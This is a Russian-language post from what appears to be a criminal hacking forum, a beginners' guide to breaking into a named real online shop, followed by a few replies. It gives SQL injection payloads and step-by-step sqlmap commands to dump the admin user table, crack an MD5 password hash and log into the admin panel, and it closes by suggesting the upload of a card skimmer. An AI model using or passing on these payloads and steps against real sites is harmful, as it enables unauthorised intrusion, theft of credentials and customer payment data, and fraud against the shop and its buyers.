• XSS.stack #1 – первый литературный журнал от юзеров форума

Статья Взлом сайтов для начинающих

malloy05

(L2) cache
Пользователь
Регистрация
14.08.2020
Сообщения
363
Реакции
175
Депозит
0.0012
Всем привет)),всех с наступающим новым годом!).эта статья рассчитана на новичков в этой теме.так как статья для новеньких,в статье не будет описан поиск уязвимостей 'в ручную', способы нахождения реального айпи сайта за фаерволом и фаззинг админки.в статье будет описана работа c автоматическим сканером акунетикс и получение доступа к базе данных простого интернет магазина без серьезных защит.собирать таргеты можно с помощью парсинга или в ручную,как вам угодно. так же всегда проверяйте наличие админки по пути /admin наш сайт https://vasantmasala.com/ и админка этого сайта находится по адресу https://vasantmasala.com/admin.

1. Нам понадобится сканер acunetix. его можно скачать тут www.dr-farfar.com

2. sqlmap на кали/парроте
советую скачать отельный браузер под сканер.

3. запускаем сканер открываем вкладку таргет,добавляем наш сайт https://vasantmasala.com/

выбираем скорость moderate, режим sql injections, site login вкл и выбираем использовать пред записаный
нажимаем new открывается окно магазина и вы должны кликнуть на login и вбить в логин и пароль абсолютно любой текст и нажать логин,после того как сайт выдаст что такого пользователя нет,нажимаем финиш,и проверяем не сбились ли настройки которые мы выставляли изначально,если сбились выставляем обратно и нажимаем ок сверху. ждем когда будет 100%.





у данного сканера нет режима паузы.если остановить сканирование,то при повторном запуске сканирование будет с 0%.обратите внимение что столбик 'parametr' в сканере всегда должен быть заполнен.попадаются много сайтов где данная колонка будет пуста,такое можете удалять.





заранее скажу что не все ошибки могут раскрутиться в склмап. типы ошибок- https://studylib.ru/doc/2437369/sql-injections-boolean-based-blind-time-based-blind-error

команды sqlmap - https://kali.tools/?p=816



подсказка по командам которые чаще всего вы будете использовать по уязвимостям которые обнаружит этот сканер и пейлоадам по которым вы можете определить тип уязвимости



1)boolean based.команда -BEUSQ

Её можно определить как по пейлоаду так и по тому что у тебя два запроса к сайту и два ответа от него

95670254'%20or%20'4484'%3d'4484



2)Time based. команда -T

+(select*from(select(sleep(20)))a)+,

'%2c0)waitfor%20delay'0%3a0%3a20'--
нажимаем на уязвимость найденную сканером,то что я выделил красным это 1)loadId -параметр и 0'XOR(if(n.. это пейлоад.далее нам нужно пролистать немного страницу вниз и открыть вкладку HTTP Request

Копируем весь этот запрос в блокнот.далее нужно удалить пейлоад 0'XOR(if(now()=sysdate()%2Csleep(6)%2C0))XOR'Z& из этого запроса и копировать его в любой тектовый редактор на кали и сохраняем

Далее с помощью sqlmap попробуем раскрутить эту ошибку. исходя из пейлоада мы можем понять что техника Time based и указываем команду.

sqlmap -r /home/kali/@old_mancard.txt —level 5 —risk 3 -p loadId —technique=T
как видим ошибка удачно раскрутилась,следующим шагом будет получение списка бд этого сайта,к основной команде (она выше) добавляем --dbs и ждем пока получит,в нашем случае нас интереусет база vasamantmasala



наша задача получить данные админа (логин и пароль) для входа в админку сайта.как правило данные админа это первые несколько пользователей в базе данных юзеров. попробуем найти пароли в данном случаем указываем команду sqlmap -r /home/kali/@old_mancard.txt —level 5 —risk 3 -p loadId —technique=T -D vasantmasala -C password --search
теперь нам нужно сдампить эти данные и расшифровать их. команда -T admin_user --dump
после того как данные сдампились,из папки sqlmap импортируем лог который мы сдампили на винду и открываем его в программе winscp.
перед нами хэши паролей и юзеры,далее нам нужно расшифровать хэши на любом из доступных в сети сервисов что бы далее зайти в админку сайта
либо если у вас достаточно мощности можете сами брутить хэши,хэши бывают относительно простыми и относительно труднорасшифровываемыми. перейдем к определеию типа хэша данных админских данных,как видите на скирншоте у некоторых хэшей после основной части 098f6bcd4621d373cade4e832627b4f6 присутствует еще двоетоие и продолжение,это называется посоленый хэш,так делают дабы усложнить расшифровку. мы выберем хжш юзера developer и отправляемся на сайт Hashes.com где и пробуем расшифровать этот MD5 хэш.
хэш удачно расшифрован,теперь заходим в админку по develover:test. теперь мы поулчили доступ в админку сайта и можем делать что хотим)можжем поменять что то в описании или добавить свое,либо загрузить сни**ер)
Копипаст
 
Пожалуйста, обратите внимание, что пользователь заблокирован
Минимум две такие же статьи, только более расписанные на форуме есть
threads/37552/ - вот одна
видел такую же ток по свежее с добавлением пары фишек от автора. Кого интересует поищите сами.
 


Напишите ответ...
  • Вставить:
Прикрепить файлы
Верх